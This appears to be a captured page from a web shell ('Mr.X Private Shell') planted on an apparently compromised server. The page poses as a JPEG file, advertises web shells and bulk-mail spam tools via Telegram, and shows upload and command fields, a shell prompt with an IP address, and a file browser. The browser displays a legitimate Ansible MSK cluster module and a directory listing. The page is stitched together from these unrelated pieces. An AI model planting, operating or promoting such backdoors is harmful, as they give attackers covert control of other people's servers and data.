����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
# Copyright: (c) 2021, Daniil Kupchenko (@oukooveu)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

from __future__ import absolute_import, division, print_function

__metaclass__ = type


DOCUMENTATION = r"""
---
module: msk_cluster
short_description: Manage Amazon MSK clusters
version_added: "2.0.0"
description:
    - Create, delete and modify Amazon MSK (Managed Streaming for Apache Kafka) clusters.
    - Prior to release 5.0.0 this module was called C(community.aws.aws_msk_cluster).
      The usage did not change.
author:
    - Daniil Kupchenko (@oukooveu)
options:
    state:
        description: Create (C(present)) or delete (C(absent)) cluster.
        choices: ['present', 'absent']
        type: str
        default: 'present'
    name:
        description: The name of the cluster.
        required: true
        type: str
    version:
        description:
            - The version of Apache Kafka.
            - This version should exist in given configuration.
            - This parameter is required when I(state=present).
        type: str
    configuration_arn:
        description:
            - ARN of the configuration to use.
            - This parameter is required when I(state=present).
        type: str
    configuration_revision:
        description:
            - The revision of the configuration to use.
            - This parameter is required when I(state=present).
        type: int
    nodes:
        description: The number of broker nodes in the cluster. Should be greater or equal to two.
        type: int
        default: 3
    instance_type:
        description:
            - The type of Amazon EC2 instances to use for Kafka brokers.
        choices:
            - kafka.t3.small
            - kafka.m5.large
            - kafka.m5.xlarge
            - kafka.m5.2xlarge
            - kafka.m5.4xlarge
        default: kafka.t3.small
        type: str
    ebs_volume_size:
        description: The size in GiB of the EBS volume for the data drive on each broker node.
        type: int
        default: 100
    subnets:
        description:
            - The list of subnets to connect to in the client virtual private cloud (VPC).
              AWS creates elastic network interfaces inside these subnets. Client applications use
              elastic network interfaces to produce and consume data.
            - Client subnets can't be in Availability Zone us-east-1e.
            - This parameter is required when I(state=present).
        type: list
        elements: str
    security_groups:
        description:
            - The AWS security groups to associate with the elastic network interfaces in order to specify
              who can connect to and communicate with the Amazon MSK cluster.
              If you don't specify a security group, Amazon MSK uses the default security group associated with the VPC.
        type: list
        elements: str
    encryption:
        description:
            - Includes all encryption-related information.
            - Effective only for new cluster and can not be updated.
        type: dict
        suboptions:
            kms_key_id:
                description:
                    - The ARN of the AWS KMS key for encrypting data at rest. If you don't specify a KMS key, MSK creates one for you and uses it.
                default: Null
                type: str
            in_transit:
                description: The details for encryption in transit.
                type: dict
                suboptions:
                    in_cluster:
                        description:
                            - When set to true, it indicates that data communication among the broker nodes of the cluster is encrypted.
                              When set to false, the communication happens in plaintext.
                        type: bool
                        default: True
                    client_broker:
                        description:
                            - Indicates the encryption setting for data in transit between clients and brokers. The following are the possible values.
                              TLS means that client-broker communication is enabled with TLS only.
                              TLS_PLAINTEXT means that client-broker communication is enabled for both TLS-encrypted, as well as plaintext data.
                              PLAINTEXT means that client-broker communication is enabled in plaintext only.
                        choices:
                            - TLS
                            - TLS_PLAINTEXT
                            - PLAINTEXT
                        type: str
                        default: TLS
    authentication:
        description:
            - Includes all client authentication related information.
            - Effective only for new cluster and can not be updated.
        type: dict
        suboptions:
            tls_ca_arn:
                description: List of ACM Certificate Authority ARNs.
                type: list
                elements: str
            sasl_scram:
                description: SASL/SCRAM authentication is enabled or not.
                type: bool
            sasl_iam:
                version_added: 5.5.0
                description: IAM authentication is enabled or not.
                type: bool
            unauthenticated:
                version_added: 5.5.0
                description: Option to explicitly turn on or off authentication
                type: bool
                default: True
    enhanced_monitoring:
        description: Specifies the level of monitoring for the MSK cluster.
        choices:
            - DEFAULT
            - PER_BROKER
            - PER_TOPIC_PER_BROKER
            - PER_TOPIC_PER_PARTITION
        default: DEFAULT
        type: str
    open_monitoring:
        description: The settings for open monitoring.
        type: dict
        suboptions:
            jmx_exporter:
                description: Indicates whether you want to enable or disable the JMX Exporter.
                type: bool
                default: False
            node_exporter:
                description: Indicates whether you want to enable or disable the Node Exporter.
                type: bool
                default: False
    logging:
        description: Logging configuration.
        type: dict
        suboptions:
            cloudwatch:
                description: Details of the CloudWatch Logs destination for broker logs.
                type: dict
                suboptions:
                    enabled:
                        description: Specifies whether broker logs get sent to the specified CloudWatch Logs destination.
                        type: bool
                        default: False
                    log_group:
                        description: The CloudWatch log group that is the destination for broker logs.
                        type: str
                        required: False
            firehose:
                description: Details of the Kinesis Data Firehose delivery stream that is the destination for broker logs.
                type: dict
                suboptions:
                    enabled:
                        description: Specifies whether broker logs get send to the specified Kinesis Data Firehose delivery stream.
                        type: bool
                        default: False
                    delivery_stream:
                        description: The Kinesis Data Firehose delivery stream that is the destination for broker logs.
                        type: str
                        required: False
            s3:
                description: Details of the Amazon S3 destination for broker logs.
                type: dict
                suboptions:
                    enabled:
                        description: Specifies whether broker logs get sent to the specified Amazon S3 destination.
                        type: bool
                        default: False
                    bucket:
                        description: The name of the S3 bucket that is the destination for broker logs.
                        type: str
                        required: False
                    prefix:
                        description: The S3 prefix that is the destination for broker logs.
                        type: str
                        required: False
    wait:
        description: Whether to wait for the cluster to be available or deleted.
        type: bool
        default: false
    wait_timeout:
        description: How many seconds to wait. Cluster creation can take up to 20-30 minutes.
        type: int
        default: 3600
extends_documentation_fragment:
    - amazon.aws.aws
    - amazon.aws.ec2
    - amazon.aws.boto3
    - amazon.aws.tags
notes:
    - All operations are time consuming, for example create takes 20-30 minutes,
      update kafka version -- more than one hour, update configuration -- 10-15 minutes;
    - Cluster's brokers get evenly distributed over a number of availability zones
      that's equal to the number of subnets.
"""

EXAMPLES = r"""
# Note: These examples do not set authentication details, see the AWS Guide for details.

- community.aws.msk_cluster:
    name: kafka-cluster
    state: present
    version: 2.6.1
    nodes: 6
    ebs_volume_size: "{{ aws_msk_options.ebs_volume_size }}"
    subnets:
      - subnet-e3b48ce7c25861eeb
      - subnet-2990c8b25b07ddd43
      - subnet-d9fbeaf46c54bfab6
    wait: true
    wait_timeout: 1800
    configuration_arn: arn:aws:kafka:us-east-1:123456789012:configuration/kafka-cluster-configuration/aaaaaaaa-bbbb-4444-3333-ccccccccc-1
    configuration_revision: 1

- community.aws.msk_cluster:
    name: kafka-cluster
    state: absent
"""

RETURN = r"""
# These are examples of possible return values, and in general should use other names for return values.

bootstrap_broker_string:
    description: A list of brokers that a client application can use to bootstrap.
    type: complex
    contains:
        plain:
            description: A string containing one or more hostname:port pairs.
            type: str
        tls:
            description: A string containing one or more DNS names (or IP) and TLS port pairs.
            type: str
    returned: I(state=present) and cluster state is I(ACTIVE)
cluster_info:
    description: Description of the MSK cluster.
    type: dict
    returned: I(state=present)
response:
    description: The response from actual API call.
    type: dict
    returned: always
    sample: {}
"""

import time

try:
    import botocore
except ImportError:
    pass  # handled by AnsibleAWSModule

from ansible_collections.amazon.aws.plugins.module_utils.core import AnsibleAWSModule
from ansible_collections.amazon.aws.plugins.module_utils.ec2 import (
    camel_dict_to_snake_dict,
    compare_aws_tags,
    AWSRetry,
)


@AWSRetry.jittered_backoff(retries=5, delay=5)
def list_clusters_with_backoff(client, cluster_name):
    paginator = client.get_paginator("list_clusters")
    return paginator.paginate(ClusterNameFilter=cluster_name).build_full_result()


@AWSRetry.jittered_backoff(retries=5, delay=5)
def list_nodes_with_backoff(client, cluster_arn):
    paginator = client.get_paginator("list_nodes")
    return paginator.paginate(ClusterArn=cluster_arn).build_full_result()


def find_cluster_by_name(client, module, cluster_name):
    try:
        cluster_list = list_clusters_with_backoff(client, cluster_name).get("ClusterInfoList", [])
    except (
        botocore.exceptions.BotoCoreError,
        botocore.exceptions.ClientError,
    ) as e:
        module.fail_json_aws(e, "Failed to find kafka cluster by name")
    if cluster_list:
        if len(cluster_list) != 1:
            module.fail_json(msg="Found more than one cluster with name '{0}'".format(cluster_name))
        return cluster_list[0]
    return {}


def get_cluster_state(client, module, arn):
    try:
        response = client.describe_cluster(ClusterArn=arn, aws_retry=True)
    except client.exceptions.NotFoundException:
        return "DELETED"
    except (
        botocore.exceptions.BotoCoreError,
        botocore.exceptions.ClientError,
    ) as e:
        module.fail_json_aws(e, "Failed to get kafka cluster state")
    return response["ClusterInfo"]["State"]


def get_cluster_version(client, module, arn):
    try:
        response = client.describe_cluster(ClusterArn=arn, aws_retry=True)
    except (
        botocore.exceptions.BotoCoreError,
        botocore.exceptions.ClientError,
    ) as e:
        module.fail_json_aws(e, "Failed to get kafka cluster version")
    return response["ClusterInfo"]["CurrentVersion"]


def wait_for_cluster_state(client, module, arn, state="ACTIVE"):
    # As of 2021-06 boto3 doesn't offer any built in waiters
    start = time.time()
    timeout = int(module.params.get("wait_timeout"))
    check_interval = 60
    while True:
        current_state = get_cluster_state(client, module, arn)
        if current_state == state:
            return
        if time.time() - start > timeout:
            module.fail_json(
                msg="Timeout waiting for cluster {0} (desired state is '{1}')".format(
                    current_state, state
                )
            )
        time.sleep(check_interval)


def prepare_create_options(module):
    """
    Return data structure for cluster create operation
    """

    c_params = {
        "ClusterName": module.params["name"],
        "KafkaVersion": module.params["version"],
        "ConfigurationInfo": {
            "Arn": module.params["configuration_arn"],
            "Revision": module.params["configuration_revision"],
        },
        "NumberOfBrokerNodes": module.params["nodes"],
        "BrokerNodeGroupInfo": {
            "ClientSubnets": module.params["subnets"],
            "InstanceType": module.params["instance_type"],
        }
    }

    if module.params["security_groups"] and len(module.params["security_groups"]) != 0:
        c_params["BrokerNodeGroupInfo"]["SecurityGroups"] = module.params.get("security_groups")

    if module.params["ebs_volume_size"]:
        c_params["BrokerNodeGroupInfo"]["StorageInfo"] = {
            "EbsStorageInfo": {
                "VolumeSize": module.params.get("ebs_volume_size")
            }
        }

    if module.params["encryption"]:
        c_params["EncryptionInfo"] = {}
        if module.params["encryption"].get("kms_key_id"):
            c_params["EncryptionInfo"]["EncryptionAtRest"] = {
                "DataVolumeKMSKeyId": module.params["encryption"]["kms_key_id"]
            }
        c_params["EncryptionInfo"]["EncryptionInTransit"] = {
            "ClientBroker": module.params["encryption"]["in_transit"].get("client_broker", "TLS"),
            "InCluster": module.params["encryption"]["in_transit"].get("in_cluster", True)
        }

    if module.params["authentication"]:
        c_params["ClientAuthentication"] = {}
        if module.params["authentication"].get("sasl_scram") or module.params["authentication"].get("sasl_iam"):
            sasl = {}
            if module.params["authentication"].get("sasl_scram"):
                sasl["Scram"] = {"Enabled": True}
            if module.params["authentication"].get("sasl_iam"):
                sasl["Iam"] = {"Enabled": True}
            c_params["ClientAuthentication"]["Sasl"] = sasl
        if module.params["authentication"].get("tls_ca_arn"):
            c_params["ClientAuthentication"]["Tls"] = {
                "CertificateAuthorityArnList": module.params["authentication"]["tls_ca_arn"],
                "Enabled": True,
            }
        if module.params["authentication"].get("unauthenticated"):
            c_params["ClientAuthentication"] = {
                "Unauthenticated": {"Enabled": True},
            }

    c_params.update(prepare_enhanced_monitoring_options(module))
    c_params.update(prepare_open_monitoring_options(module))
    c_params.update(prepare_logging_options(module))

    return c_params


def prepare_enhanced_monitoring_options(module):
    m_params = {}
    m_params["EnhancedMonitoring"] = module.params["enhanced_monitoring"] or "DEFAULT"
    return m_params


def prepare_open_monitoring_options(module):
    m_params = {}
    open_monitoring = module.params["open_monitoring"] or {}
    m_params["OpenMonitoring"] = {
        "Prometheus": {
            "JmxExporter": {
                "EnabledInBroker": open_monitoring.get("jmx_exporter", False)
            },
            "NodeExporter": {
                "EnabledInBroker": open_monitoring.get("node_exporter", False)
            }
        }
    }
    return m_params


def prepare_logging_options(module):
    l_params = {}
    logging = module.params["logging"] or {}
    if logging.get("cloudwatch"):
        l_params["CloudWatchLogs"] = {
            "Enabled": module.params["logging"]["cloudwatch"].get("enabled"),
            "LogGroup": module.params["logging"]["cloudwatch"].get("log_group")
        }
    else:
        l_params["CloudWatchLogs"] = {
            "Enabled": False
        }
    if logging.get("firehose"):
        l_params["Firehose"] = {
            "Enabled": module.params["logging"]["firehose"].get("enabled"),
            "DeliveryStream": module.params["logging"]["firehose"].get("delivery_stream")
        }
    else:
        l_params["Firehose"] = {
            "Enabled": False
        }
    if logging.get("s3"):
        l_params["S3"] = {
            "Enabled": module.params["logging"]["s3"].get("enabled"),
            "Bucket": module.params["logging"]["s3"].get("bucket"),
            "Prefix": module.params["logging"]["s3"].get("prefix")
        }
    else:
        l_params["S3"] = {
            "Enabled": False
        }
    return {
        "LoggingInfo": {
            "BrokerLogs": l_params
        }
    }


def create_or_update_cluster(client, module):
    """
    Create new or update existing cluster
    """

    changed = False
    response = {}

    cluster = find_cluster_by_name(client, module, module.params["name"])

    if not cluster:

        changed = True

        if module.check_mode:
            return True, {}

        create_params = prepare_create_options(module)

        try:
            response = client.create_cluster(aws_retry=True, **create_params)
        except (
            botocore.exceptions.BotoCoreError,
            botocore.exceptions.ClientError,
        ) as e:
            module.fail_json_aws(e, "Failed to create kafka cluster")

        if module.params.get("wait"):
            wait_for_cluster_state(client, module, arn=response["ClusterArn"], state="ACTIVE")

    else:

        response["ClusterArn"] = cluster["ClusterArn"]
        response["changes"] = {}

        # prepare available update methods definitions with current/target values and options
        msk_cluster_changes = {
            "broker_count": {
                "current_value": cluster["NumberOfBrokerNodes"],
                "target_value": module.params.get("nodes"),
                "update_params": {
                    "TargetNumberOfBrokerNodes": module.params.get("nodes")
                }
            },
            "broker_storage": {
                "current_value": cluster["BrokerNodeGroupInfo"]["StorageInfo"]["EbsStorageInfo"]["VolumeSize"],
                "target_value": module.params.get("ebs_volume_size"),
                "update_params": {
                    "TargetBrokerEBSVolumeInfo": [
                        {"KafkaBrokerNodeId": "All", "VolumeSizeGB": module.params.get("ebs_volume_size")}
                    ]
                }
            },
            "broker_type": {
                "current_value": cluster["BrokerNodeGroupInfo"]["InstanceType"],
                "target_value": module.params.get("instance_type"),
                "update_params": {
                    "TargetInstanceType": module.params.get("instance_type")
                }
            },
            "cluster_configuration": {
                "current_value": {
                    "arn": cluster["CurrentBrokerSoftwareInfo"]["ConfigurationArn"],
                    "revision": cluster["CurrentBrokerSoftwareInfo"]["ConfigurationRevision"],
                },
                "target_value": {
                    "arn": module.params.get("configuration_arn"),
                    "revision": module.params.get("configuration_revision"),
                },
                "update_params": {
                    "ConfigurationInfo": {
                        "Arn": module.params.get("configuration_arn"),
                        "Revision": module.params.get("configuration_revision")
                    }
                }
            },
            "cluster_kafka_version": {
                "current_value": cluster["CurrentBrokerSoftwareInfo"]["KafkaVersion"],
                "target_value": module.params.get("version"),
                "update_params": {
                    "TargetKafkaVersion": module.params.get("version")
                }
            },
            "enhanced_monitoring": {
                "current_value": cluster["EnhancedMonitoring"],
                "target_value": module.params.get("enhanced_monitoring"),
                "update_method": "update_monitoring",
                "update_params": prepare_enhanced_monitoring_options(module)
            },
            "open_monitoring": {
                "current_value": {
                    "OpenMonitoring": cluster["OpenMonitoring"]
                },
                "target_value": prepare_open_monitoring_options(module),
                "update_method": "update_monitoring",
                "update_params": prepare_open_monitoring_options(module)
            },
            "logging": {
                "current_value": {
                    "LoggingInfo": cluster["LoggingInfo"]
                },
                "target_value": prepare_logging_options(module),
                "update_method": "update_monitoring",
                "update_params": prepare_logging_options(module)
            }
        }

        for method, options in msk_cluster_changes.items():

            if 'botocore_version' in options:
                if not module.botocore_at_least(options["botocore_version"]):
                    continue

            try:
                update_method = getattr(client, options.get("update_method", "update_" + method))
            except AttributeError as e:
                module.fail_json_aws(e, "There is no update method 'update_{0}'".format(method))

            if options["current_value"] != options["target_value"]:
                changed = True
                if module.check_mode:
                    return True, {}

                # need to get cluster version and check for the state because
                # there can be several updates requested but only one in time can be performed
                version = get_cluster_version(client, module, cluster["ClusterArn"])
                state = get_cluster_state(client, module, cluster["ClusterArn"])
                if state != "ACTIVE":
                    if module.params["wait"]:
                        wait_for_cluster_state(client, module, arn=cluster["ClusterArn"], state="ACTIVE")
                    else:
                        module.fail_json(
                            msg="Cluster can be updated only in active state, current state is '{0}'. check cluster state or use wait option".format(
                                state
                            )
                        )
                try:
                    response["changes"][method] = update_method(
                        ClusterArn=cluster["ClusterArn"],
                        CurrentVersion=version,
                        **options["update_params"]
                    )
                except (
                    botocore.exceptions.BotoCoreError,
                    botocore.exceptions.ClientError,
                ) as e:
                    module.fail_json_aws(
                        e, "Failed to update cluster via 'update_{0}'".format(method)
                    )

                if module.params["wait"]:
                    wait_for_cluster_state(client, module, arn=cluster["ClusterArn"], state="ACTIVE")

    changed |= update_cluster_tags(client, module, response["ClusterArn"])

    return changed, response


def update_cluster_tags(client, module, arn):
    new_tags = module.params.get('tags')
    if new_tags is None:
        return False
    purge_tags = module.params.get('purge_tags')

    try:
        existing_tags = client.list_tags_for_resource(ResourceArn=arn, aws_retry=True)['Tags']
    except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:
        module.fail_json_aws(e, msg="Unable to retrieve tags for cluster '{0}'".format(arn))

    tags_to_add, tags_to_remove = compare_aws_tags(existing_tags, new_tags, purge_tags=purge_tags)

    if not module.check_mode:
        try:
            if tags_to_remove:
                client.untag_resource(ResourceArn=arn, TagKeys=tags_to_remove, aws_retry=True)
            if tags_to_add:
                client.tag_resource(ResourceArn=arn, Tags=tags_to_add, aws_retry=True)
        except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:
            module.fail_json_aws(e, msg="Unable to set tags for cluster '{0}'".format(arn))

    changed = bool(tags_to_add) or bool(tags_to_remove)
    return changed


def delete_cluster(client, module):

    cluster = find_cluster_by_name(client, module, module.params["name"])

    if module.check_mode:
        if cluster:
            return True, cluster
        else:
            return False, {}

    if not cluster:
        return False, {}

    try:
        response = client.delete_cluster(
            ClusterArn=cluster["ClusterArn"],
            CurrentVersion=cluster["CurrentVersion"],
        )
    except (botocore.exceptions.BotoCoreError, botocore.exceptions.ClientError) as e:
        module.fail_json_aws(e, "Failed to delete kafka cluster")

    if module.params["wait"]:
        wait_for_cluster_state(client, module, arn=cluster["ClusterArn"], state="DELETED")

    response["bootstrap_broker_string"] = {}

    return True, response


def main():

    module_args = dict(
        name=dict(type="str", required=True),
        state=dict(type="str", choices=["present", "absent"], default="present"),
        version=dict(type="str"),
        configuration_arn=dict(type="str"),
        configuration_revision=dict(type="int"),
        nodes=dict(type="int", default=3),
        instance_type=dict(
            choices=[
                "kafka.t3.small",
                "kafka.m5.large",
                "kafka.m5.xlarge",
                "kafka.m5.2xlarge",
                "kafka.m5.4xlarge",
            ],
            default="kafka.t3.small",
        ),
        ebs_volume_size=dict(type="int", default=100),
        subnets=dict(type="list", elements="str"),
        security_groups=dict(type="list", elements="str", required=False),
        encryption=dict(
            type="dict",
            options=dict(
                kms_key_id=dict(type="str", required=False),
                in_transit=dict(
                    type="dict",
                    options=dict(
                        in_cluster=dict(type="bool", default=True),
                        client_broker=dict(
                            choices=["TLS", "TLS_PLAINTEXT", "PLAINTEXT"],
                            default="TLS"
                        ),
                    ),
                ),
            ),
        ),
        authentication=dict(
            type="dict",
            options=dict(
                tls_ca_arn=dict(type="list", elements="str", required=False),
                sasl_scram=dict(type="bool", required=False),
                sasl_iam=dict(type="bool", required=False),
                unauthenticated=dict(type="bool", default=True, required=False),
            ),
        ),
        enhanced_monitoring=dict(
            choices=[
                "DEFAULT",
                "PER_BROKER",
                "PER_TOPIC_PER_BROKER",
                "PER_TOPIC_PER_PARTITION",
            ],
            default="DEFAULT",
            required=False,
        ),
        open_monitoring=dict(
            type="dict",
            options=dict(
                jmx_exporter=dict(type="bool", default=False),
                node_exporter=dict(type="bool", default=False),
            ),
        ),
        logging=dict(
            type="dict",
            options=dict(
                cloudwatch=dict(
                    type="dict",
                    options=dict(
                        enabled=dict(type="bool", default=False),
                        log_group=dict(type="str", required=False),
                    ),
                ),
                firehose=dict(
                    type="dict",
                    options=dict(
                        enabled=dict(type="bool", default=False),
                        delivery_stream=dict(type="str", required=False),
                    ),
                ),
                s3=dict(
                    type="dict",
                    options=dict(
                        enabled=dict(type="bool", default=False),
                        bucket=dict(type="str", required=False),
                        prefix=dict(type="str", required=False),
                    ),
                ),
            ),
        ),
        wait=dict(type="bool", default=False),
        wait_timeout=dict(type="int", default=3600),
        tags=dict(type='dict', aliases=['resource_tags']),
        purge_tags=dict(type='bool', default=True),
    )

    module = AnsibleAWSModule(
        argument_spec=module_args,
        required_if=[['state', 'present', ['version', 'configuration_arn', 'configuration_revision', 'subnets']]],
        supports_check_mode=True
    )

    client = module.client("kafka", retry_decorator=AWSRetry.jittered_backoff())

    if module.params["state"] == "present":
        if len(module.params["subnets"]) < 2:
            module.fail_json(
                msg="At least two client subnets should be provided"
            )
        if int(module.params["nodes"]) % int(len(module.params["subnets"])) != 0:
            module.fail_json(
                msg="The number of broker nodes must be a multiple of availability zones in the subnets parameter"
            )
        if len(module.params["name"]) > 64:
            module.fail_json(
                module.fail_json(msg='Cluster name "{0}" exceeds 64 character limit'.format(module.params["name"]))
            )
        changed, response = create_or_update_cluster(client, module)
    elif module.params["state"] == "absent":
        changed, response = delete_cluster(client, module)

    cluster_info = {}
    bootstrap_broker_string = {}
    if response.get("ClusterArn") and module.params["state"] == "present":
        try:
            cluster_info = client.describe_cluster(ClusterArn=response["ClusterArn"], aws_retry=True)[
                "ClusterInfo"
            ]
            if cluster_info.get("State") == "ACTIVE":
                brokers = client.get_bootstrap_brokers(ClusterArn=response["ClusterArn"], aws_retry=True)
                if brokers.get("BootstrapBrokerString"):
                    bootstrap_broker_string["plain"] = brokers["BootstrapBrokerString"]
                if brokers.get("BootstrapBrokerStringTls"):
                    bootstrap_broker_string["tls"] = brokers["BootstrapBrokerStringTls"]
        except (
            botocore.exceptions.BotoCoreError,
            botocore.exceptions.ClientError,
        ) as e:
            module.fail_json_aws(
                e,
                "Can not obtain information about cluster {0}".format(
                    response["ClusterArn"]
                ),
            )

    module.exit_json(
        changed=changed,
        bootstrap_broker_string=bootstrap_broker_string,
        cluster_info=camel_dict_to_snake_dict(cluster_info),
        response=camel_dict_to_snake_dict(response),
    )


if __name__ == "__main__":
    main()

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 0 B 0644
accessanalyzer_validate_policy_info.py File 8.57 KB 0644
acm_certificate.py File 21.94 KB 0644
acm_certificate_info.py File 9.61 KB 0644
api_gateway.py File 12.97 KB 0644
api_gateway_domain.py File 12.43 KB 0644
application_autoscaling_policy.py File 22.77 KB 0644
autoscaling_complete_lifecycle_action.py File 2.88 KB 0644
autoscaling_instance_refresh.py File 9.89 KB 0644
autoscaling_instance_refresh_info.py File 7.21 KB 0644
autoscaling_launch_config.py File 24.4 KB 0644
autoscaling_launch_config_find.py File 6.45 KB 0644
autoscaling_launch_config_info.py File 6.78 KB 0644
autoscaling_lifecycle_hook.py File 10.57 KB 0644
autoscaling_policy.py File 23.13 KB 0644
autoscaling_scheduled_action.py File 9.42 KB 0644
aws_region_info.py File 3.06 KB 0644
batch_compute_environment.py File 15.81 KB 0644
batch_job_definition.py File 15.89 KB 0644
batch_job_queue.py File 9.5 KB 0644
cloudformation_exports_info.py File 2.11 KB 0644
cloudformation_stack_set.py File 31.98 KB 0644
cloudfront_distribution.py File 98.71 KB 0644
cloudfront_distribution_info.py File 28.98 KB 0644
cloudfront_invalidation.py File 10 KB 0644
cloudfront_origin_access_identity.py File 9.38 KB 0644
cloudfront_response_headers_policy.py File 10.55 KB 0644
codebuild_project.py File 18.98 KB 0644
codecommit_repository.py File 7.94 KB 0644
codepipeline.py File 10.71 KB 0644
config_aggregation_authorization.py File 5.11 KB 0644
config_aggregator.py File 7.95 KB 0644
config_delivery_channel.py File 7.68 KB 0644
config_recorder.py File 7.7 KB 0644
config_rule.py File 9.85 KB 0644
data_pipeline.py File 20.86 KB 0644
directconnect_confirm_connection.py File 5.47 KB 0644
directconnect_connection.py File 12.34 KB 0644
directconnect_gateway.py File 13.25 KB 0644
directconnect_link_aggregation_group.py File 17.75 KB 0644
directconnect_virtual_interface.py File 17.79 KB 0644
dms_endpoint.py File 22.77 KB 0644
dms_replication_subnet_group.py File 7.58 KB 0644
dynamodb_table.py File 35.98 KB 0644
dynamodb_ttl.py File 4.61 KB 0644
ec2_ami_copy.py File 6.98 KB 0644
ec2_customer_gateway.py File 7.89 KB 0644
ec2_customer_gateway_info.py File 4.59 KB 0644
ec2_launch_template.py File 35.09 KB 0644
ec2_placement_group.py File 7.33 KB 0644
ec2_placement_group_info.py File 3.12 KB 0644
ec2_snapshot_copy.py File 5.41 KB 0644
ec2_transit_gateway.py File 17.24 KB 0644
ec2_transit_gateway_info.py File 8.87 KB 0644
ec2_transit_gateway_vpc_attachment.py File 10.92 KB 0644
ec2_transit_gateway_vpc_attachment_info.py File 5.61 KB 0644
ec2_vpc_egress_igw.py File 6.15 KB 0644
ec2_vpc_nacl.py File 21.18 KB 0644
ec2_vpc_nacl_info.py File 7.17 KB 0644
ec2_vpc_peer.py File 20.84 KB 0644
ec2_vpc_peering_info.py File 8.97 KB 0644
ec2_vpc_vgw.py File 19.07 KB 0644
ec2_vpc_vgw_info.py File 5.68 KB 0644
ec2_vpc_vpn.py File 31.5 KB 0644
ec2_vpc_vpn_info.py File 7.29 KB 0644
ec2_win_password.py File 6.92 KB 0644
ecs_attribute.py File 9.78 KB 0644
ecs_cluster.py File 13.19 KB 0644
ecs_ecr.py File 21.46 KB 0644
ecs_service.py File 52.33 KB 0644
ecs_service_info.py File 8.5 KB 0644
ecs_tag.py File 7.35 KB 0644
ecs_task.py File 17.41 KB 0644
ecs_taskdefinition.py File 52.04 KB 0644
ecs_taskdefinition_info.py File 13.78 KB 0644
efs.py File 28.21 KB 0644
efs_info.py File 12.85 KB 0644
efs_tag.py File 5.45 KB 0644
eks_cluster.py File 9.62 KB 0644
eks_fargate_profile.py File 11.73 KB 0644
eks_nodegroup.py File 26.17 KB 0644
elasticache.py File 19.82 KB 0644
elasticache_info.py File 17.68 KB 0644
elasticache_parameter_group.py File 13.25 KB 0644
elasticache_snapshot.py File 6.82 KB 0644
elasticache_subnet_group.py File 7.56 KB 0644
elasticbeanstalk_app.py File 7.15 KB 0644
elb_classic_lb_info.py File 7.48 KB 0644
elb_instance.py File 14.27 KB 0644
elb_network_lb.py File 19.14 KB 0644
elb_target.py File 11.59 KB 0644
elb_target_group.py File 43.95 KB 0644
elb_target_group_info.py File 11.46 KB 0644
elb_target_info.py File 15.78 KB 0644
glue_connection.py File 15.36 KB 0644
glue_crawler.py File 15.58 KB 0644
glue_job.py File 18.09 KB 0644
iam_access_key.py File 9.94 KB 0644
iam_access_key_info.py File 3.56 KB 0644
iam_group.py File 16.21 KB 0644
iam_managed_policy.py File 14.16 KB 0644
iam_mfa_device_info.py File 2.92 KB 0644
iam_password_policy.py File 7.15 KB 0644
iam_role.py File 29.67 KB 0644
iam_role_info.py File 9.36 KB 0644
iam_saml_federation.py File 9.01 KB 0644
iam_server_certificate.py File 12.14 KB 0644
iam_server_certificate_info.py File 4.85 KB 0644
inspector_target.py File 7.73 KB 0644
kinesis_stream.py File 40.98 KB 0644
lightsail.py File 10.15 KB 0644
lightsail_static_ip.py File 3.89 KB 0644
msk_cluster.py File 31.56 KB 0644
msk_config.py File 9.28 KB 0644
networkfirewall.py File 11.7 KB 0644
networkfirewall_info.py File 7.24 KB 0644
networkfirewall_policy.py File 16.36 KB 0644
networkfirewall_policy_info.py File 8.78 KB 0644
networkfirewall_rule_group.py File 32.96 KB 0644
networkfirewall_rule_group_info.py File 17.8 KB 0644
opensearch.py File 55.85 KB 0644
opensearch_info.py File 19.48 KB 0644
redshift.py File 23.82 KB 0644
redshift_cross_region_snapshots.py File 6.7 KB 0644
redshift_info.py File 10.04 KB 0644
redshift_subnet_group.py File 8.18 KB 0644
s3_bucket_info.py File 20.69 KB 0644
s3_bucket_notification.py File 14.04 KB 0644
s3_cors.py File 4.18 KB 0644
s3_lifecycle.py File 26.91 KB 0644
s3_logging.py File 6.76 KB 0644
s3_metrics_configuration.py File 7.31 KB 0644
s3_sync.py File 18.77 KB 0644
s3_website.py File 11.37 KB 0644
secretsmanager_secret.py File 24.07 KB 0644
ses_identity.py File 22.99 KB 0644
ses_identity_policy.py File 7.39 KB 0644
ses_rule_set.py File 8.17 KB 0644
sns.py File 7.26 KB 0644
sns_topic.py File 27.72 KB 0644
sns_topic_info.py File 6.13 KB 0644
sqs_queue.py File 16.62 KB 0644
ssm_parameter.py File 19.82 KB 0644
stepfunctions_state_machine.py File 7.96 KB 0644
stepfunctions_state_machine_execution.py File 6.59 KB 0644
storagegateway_info.py File 11.46 KB 0644
sts_assume_role.py File 5.69 KB 0644
sts_session_token.py File 4.44 KB 0644
waf_condition.py File 29.29 KB 0644
waf_info.py File 4.27 KB 0644
waf_rule.py File 13.05 KB 0644
waf_web_acl.py File 12.41 KB 0644
wafv2_ip_set.py File 11.29 KB 0644
wafv2_ip_set_info.py File 3.93 KB 0644
wafv2_resources.py File 4.73 KB 0644
wafv2_resources_info.py File 3.11 KB 0644
wafv2_rule_group.py File 13.82 KB 0644
wafv2_rule_group_info.py File 4.64 KB 0644
wafv2_web_acl.py File 19.46 KB 0644
wafv2_web_acl_info.py File 3.95 KB 0644